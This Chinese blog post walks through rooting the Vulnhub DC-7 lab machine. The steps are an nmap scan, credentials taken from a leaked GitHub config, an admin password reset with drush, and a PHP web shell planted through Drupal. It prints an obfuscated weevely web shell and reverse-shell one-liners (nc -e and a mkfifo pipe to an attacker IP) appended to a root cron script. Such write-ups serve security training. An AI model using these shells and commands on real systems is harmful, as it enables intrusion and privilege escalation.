天道酬勤

【Vulnhub】— DC-7

一、端口扫描

因为本靶机在打开的时候,就已给出了IP,所以直接扫描端口即可。

利用nmap

root@kali:~# nmap -sV -A 192.168.203.133 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 22:50 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.133
Host is up (0.00083s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.133
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.133:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.203.133:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.203.133:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.25: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-7659	5.0	https://vulners.com/cve/CVE-2017-7659
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|_    	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
MAC Address: 00:0C:29:B2:DE:22 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.203.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.99 seconds

看到该站点开放了22端口和80端口,80端口的web服务采用的是Drupal的CMS,版本为8。

二、漏洞寻找

利用searchsploit

启动msf利用exp……都失败了。

看来得寻找别的突破点了。

三、信息搜集

访问了该靶机的站点。

给了如下提示:

Welcome to DC-7
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box.  :-)

欢迎来到DC-7

DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。

你要做的,就是在盒子外思考。

在盒子外面。:-)

在盒子外面思考,也就是告诉我们应该去互联网搜索可利用信息,但是该从何下手呢?

该CMS的左下角,有一个特别的信息,@DC7USER,我们去谷歌搜索一下。

github源码泄露??

看样子是的,我们查看一下配置文件config.php

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

我们得到了数据库的账号和秘密,先试试能不能连上ssh。

第一遍输入的时候,密码输入错了……现在成功登录了ssh。

四、提权

使用命令sudo -l

它提示我们有一封新邮件。(后来补充:You have new mail in /var/mail/dc7user其实是计划任务的结果)

查看该邮件:

dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Sun Feb 16 00:15:21 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:15:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2yE5-0000Gr-8J
	for root@dc-7; Sun, 16 Feb 2020 00:15:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2yE5-0000Gr-8J@dc-7>
Date: Sun, 16 Feb 2020 00:15:21 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 00:30:05 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:30:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2ySL-0000HV-Ld
	for root@dc-7; Sun, 16 Feb 2020 00:30:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2ySL-0000HV-Ld@dc-7>
Date: Sun, 16 Feb 2020 00:30:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 00:45:06 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:45:06 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2ygr-0000I6-Te
	for root@dc-7; Sun, 16 Feb 2020 00:45:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2ygr-0000I6-Te@dc-7>
Date: Sun, 16 Feb 2020 00:45:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:00:09 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:00:09 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2yvQ-0000JV-NC
	for root@dc-7; Sun, 16 Feb 2020 01:00:08 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2yvQ-0000JV-NC@dc-7>
Date: Sun, 16 Feb 2020 01:00:08 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:15:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:15:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2z9v-0000K6-6H
	for root@dc-7; Sun, 16 Feb 2020 01:15:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2z9v-0000K6-6H@dc-7>
Date: Sun, 16 Feb 2020 01:15:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:30:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:30:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2zOR-0000Kh-1J
	for root@dc-7; Sun, 16 Feb 2020 01:30:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2zOR-0000Kh-1J@dc-7>
Date: Sun, 16 Feb 2020 01:30:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 11:00:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 11:00:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j38I3-0000MX-Rc
	for root@dc-7; Sun, 16 Feb 2020 11:00:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j38I3-0000MX-Rc@dc-7>
Date: Sun, 16 Feb 2020 11:00:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

根据邮件中的信息,像是root用户计划执行的备份脚本。其中提到了目录/home/dc7user,我们去看一下:

结果又发现了一封邮件:

dc7user@dc-7:/home$ cd dc7user/
dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cd mbox
-bash: cd: mbox: Not a directory
dc7user@dc-7:~$ cat mbox

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3EPu-0000CV-5C
	for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3EeF-0000Dx-G1
	for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Esl-0000Ec-JQ
	for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3F7H-0000G3-Nb
	for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Hvd-0000ED-CP
	for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Jng-0000Iw-Rq
	for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3K28-0000Ll-11
	for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3LCo-0000Eb-02
	for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3O0y-0000Ed-To
	for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

然后我们再去backups目录看下

dc7user@dc-7:~/backups$ ls
website.sql.gpg  website.tar.gz.gpg

是两个gpg文件,我们cat一下:

发现全是乱码,于是我就上网上搜了搜这gpg格式的文件。大致如下:

原文链接:http://www.ruanyifeng.com/blog/2013/07/gpg.html

我们想要看文件内容,就必须先解密,但解密是需要密钥的。

思路往下,我们继续查看实现备份的脚本/opt/scripts/backups.sh

dc7user@dc-7:~/backups$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
You have new mail in /var/mail/dc7user

分析一下,该备份的就是网站数据库文件,也就是说我们没必要去解密gpg,我们可以直接去网站目录下面看看这些文件。其次,既然此脚本是root权限执行,那只要将我们反弹shell的命令写入其内,就可以获取一个rootshell。

我们先来看一下此脚本的运行权限

dc7user@dc-7:~/backups$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 /opt/scripts/backups.sh

再来看下我是谁:

dc7user@dc-7:~/backups$ whoami
dc7user

很显然,我们无法将反弹shell的命令写入backups.sh。所以,我们需要想办法变成www-data用户,该用户呢需要从Web端入手。

另外在脚本中我们还看到了一个命令drush。于是,我去百度了一下。

Drush是专门服务于drupal的第三方模块。

其实也就是专门用于管理Drupal的shell,我们可以利用该命令修改admin的密码。

dc7user@dc-7:~$ drush user-password admin --password="admin"
Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal    [error]
environment to run this command.
The drush command 'user-password admin' could not be executed.                                                               [error]

这里报错了,提示我们需要在一个有Drupal环境的情况下,运行此命令,所以我们需要跳转到目录/var/www/html

dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin                                                                [success]

可以看到执行成功。这样我们就可以登录网站的后台了。

Drupal8反弹shell

出于安全的考虑,php组件已经从Drupal的核心中移除了,但是我们可以在模块中手动安装。

我们需要检查一下是否含有php组件,先创建一个basic page

可以看到是没有PHP的。

接下来,安装PHP:

1、找到drupal官网中的php组件:

https://www.drupal.org/project/php

PHP的安装链接为:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

将此链接写入:

点击Install

安装成功。

接下来,启用组件:

现在php组件启用成功。

接下来回到Content

现在我们就可以写入PHP的代码了。

weevely生成木马

root@kali:~# weevely generate hackergu /root/hackergu.php
Generated '/root/hackergu.php' with password 'hackergu' of 742 byte size.
root@kali:~# cat hackergu.php
<?php
$H='put"#P)#P,$#Pm)==1){#P@ob_start();@e#Pval(@g#Pzunco#Pmp#Press#P(@x(@b#Pase64_#Pdecode($m[#P1]),$k)#P)#P);#P$o=#P@ob_ge';
$N='t_conte#Pnts();@ob_end#P_cl#Pean()#P;$r=@bas#Pe64_enc#Pode(@#Px(#P#P@gzc#Pompress($o),$k#P))#P;#Pprint("$p$kh$r$kf");}';
$d='$k=#P"78433#P9a5";$k#P#Ph="271d81d129#P99";$k#Pf="6da#Pd2089511#Pd";$p#P=#P"ZbTpoFQke#PsS5#PW#P04a";function#P x($t,$';
$K=str_replace('x','','xcreaxxte_fuxncxtixon');
$u='){#P$o.=$t{$i#P#P}^$k#P{$j};}}return #P$#Po;}if(@preg_mat#P#Pch("/$kh(.+)$k#Pf/",@f#Pil#Pe_get_cont#Pents("#Pphp#P://in';
$g='k#P){$c#P=strlen($#Pk#P);$l=str#Plen($t)#P;$#Po="";for($#Pi=0;$#Pi<$l;){fo#Pr($j#P=0;(#P$j<$#Pc&&$i#P#P<$l);$j++,$i++#P';
$o=str_replace('#P','',$d.$g.$u.$H.$N);
$Z=$K('',$o);$Z();
?>

weevely generate 密码 生成的路径及文件名

将生成的木马写入:

点击save

weevely连接木马

weevely http://192.168.203.133/node/4 hackergu

root@kali:~# weevely http://192.168.203.133/node/4 hackergu

[+] weevely 3.7.0

[+] Target:	192.168.203.133
[+] Session:	/root/.weevely/sessions/192.168.203.133/4_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
www-data
www-data@dc-7:/var/www/html $ 

成功连接,同时我们也看到当前用户为www-data。现在我们就可以写入脚本了。

echo "nc 192.168.203.129 7777 -e /bin/bash" >> backups.sh

发现weevely里,执行不了命令,还是不太熟悉,那就再反弹个shell吧。

现在我们就可以写入脚本了,但是写进去之后,我等了好久也没见得反弹shell成功……

看了大佬的思路是要这样写:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" >> backups.sh

最终获取到了flag。

root@kali:~# nc -lvp 7777
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 192.168.203.133.
Ncat: Connection from 192.168.203.133:45092.
ls
html
cd /root
ls
theflag.txt
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— DC-7
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏